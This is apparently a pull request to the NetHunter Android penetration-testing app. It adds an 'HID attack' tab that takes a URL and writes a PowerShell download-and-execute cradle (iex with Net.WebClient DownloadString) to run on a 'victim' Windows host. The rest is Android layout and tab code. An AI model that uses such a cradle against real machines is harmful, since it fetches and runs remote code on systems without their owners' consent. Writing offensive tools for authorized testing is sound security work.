### PR TITLE
Adds new tab to allow generic download and execution of PS payload

### DIFF
--- a/res/layout/hid_powershell_http.xml
+++ b/res/layout/hid_powershell_http.xml
@@ -1,0 +1,41 @@
+<ScrollView xmlns:android="http://schemas.android.com/apk/res/android"
+    android:layout_width="fill_parent"
+    android:layout_height="wrap_content">
+
+    <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
+        android:layout_width="match_parent"
+        android:layout_height="wrap_content"
+        android:paddingLeft="16dp"
+        android:paddingRight="16dp"
+        android:orientation="vertical"
+        android:focusableInTouchMode="true">
+
+
+        <TextView
+            android:layout_width="match_parent"
+            android:layout_height="wrap_content"
+            android:text="The Powershell HTTP payload allows you to download and run a generic powershell payload from a URL. The URL to payload should be in a location accessible to the victim."
+            android:layout_gravity="center_horizontal|center"
+            android:gravity="center"
+            android:padding="4dp" />
+        <TextView
+            android:layout_width="230dp"
+            android:layout_height="match_parent"
+            android:text="@string/ps_payload_url"
+            android:padding="4dp" />
+
+        <EditText
+            android:id="@+id/payloadUrl"
+            android:layout_width="match_parent"
+            android:layout_height="wrap_content"
+            android:ems="10"
+            android:inputType="text"/>
+
+        <Button
+            android:id="@+id/powershellOptionsUpdate"
+            android:layout_width="wrap_content"
+            android:layout_height="wrap_content"
+            android:text="@string/update" />
+    </LinearLayout>
+
+</ScrollView>

--- a/src/com/offsec/nethunter/HidFragment.java
+++ b/src/com/offsec/nethunter/HidFragment.java
@@ -314,8 +314,10 @@ public class HidFragment extends Fragment implements ActionBar.TabListener {
             switch (i) {
                 case 0:
                     return new PowerSploitFragment();
-                default:
+                case 1:
                     return new WindowsCmdFragment();
+                default:
+                    return new PowershellHttpFragment();
             }
         }
 
@@ -326,7 +328,7 @@ public class HidFragment extends Fragment implements ActionBar.TabListener {
 
         @Override
         public int getCount() {
-            return 2;
+            return 3;
         }
 
         @Override
@@ -334,8 +336,10 @@ public class HidFragment extends Fragment implements ActionBar.TabListener {
             switch (position) {
                 case 1:
                     return "Windows CMD";
-                default:
+                case 0:
                     return "PowerSploit";
+                default:
+                    return "Powershell HTTP Payload";
             }
         }
     }
@@ -570,4 +574,72 @@ public class HidFragment extends Fragment implements ActionBar.TabListener {
             }
         }
     }
+
+    public static class PowershellHttpFragment extends HidFragment implements OnClickListener {
+
+        private final String configFilePath =  nh.CHROOT_PATH + "/var/www/html/powershell-payload";
+        private final String configFileUrlPath = nh.CHROOT_PATH + "/var/www/html/powershell-url";
+
+        @Override
+        public View onCreateView(LayoutInflater inflater, ViewGroup container,
+                                 Bundle savedInstanceState) {
+            View rootView = inflater.inflate(R.layout.hid_powershell_http, container, false);
+            Button b = (Button) rootView.findViewById(R.id.powershellOptionsUpdate);
+            b.setOnClickListener(this);
+            loadOptions(rootView);
+            return rootView;
+        }
+
+        public void onClick(View v) {
+            switch (v.getId()) {
+                case R.id.powershellOptionsUpdate:
+                    if(getView() == null){
+                        return;
+                    }
+                    ShellExecuter exe = new ShellExecuter();
+                    EditText newPayloadUrl = (EditText) getView().getRootView().findViewById(R.id.payloadUrl);
+                    String newText = "iex (New-Object Net.WebClient).DownloadString(\"" + newPayloadUrl.getText() + "\"); " ;
+
+                    Boolean isSaved = exe.SaveFileContents(newText, configFileUrlPath);
+                    if (!isSaved){
+                        nh.showMessage("Source not updated (configFileUrlPath)");
+                    }
+                    break;
+                default:
+                    nh.showMessage("Unknown click");
+                    break;
+            }
+        }
+        private void loadOptions(final View rootView) {
+            final EditText payloadUrl = (EditText) rootView.findViewById(R.id.payloadUrl);
+            final ShellExecuter exe = new ShellExecuter();
+
+            new Thread(new Runnable() {
+                public void run() {
+                    final String textUrl = exe.ReadFile_SYNC(configFileUrlPath);
+                    final String text = exe.ReadFile_SYNC(configFilePath);
+                    String regExPatPayloadUrl = "DownloadString\\(\"(.*)\"\\)";
+                    Pattern patternPayloadUrl = Pattern.compile(regExPatPayloadUrl, Pattern.MULTILINE);
+                    final Matcher matcherPayloadUrl = patternPayloadUrl.matcher(textUrl);
+
+                    String[] lines = text.split("\n");
+                    final String line = lines[lines.length - 1];
+
+                    payloadUrl.post(new Runnable() {
+                        @Override
+                        public void run() {
+
+                            if (matcherPayloadUrl.find()) {
+                                String payloadUrlValue = matcherPayloadUrl.group(1);
+                                payloadUrl.setText(payloadUrlValue);
+                            }
+
+                        }
+                    });
+                }
+            }).start();
+        }
+    }
+
+
 }


### PR DESCRIPTION
This adds a new tab that allows the user to punch in a URL to a remote powershell script, which will be downloaded and executed. HID attack 3.

Refer to: #144 #114 and offensive-security/nethunter-utils#18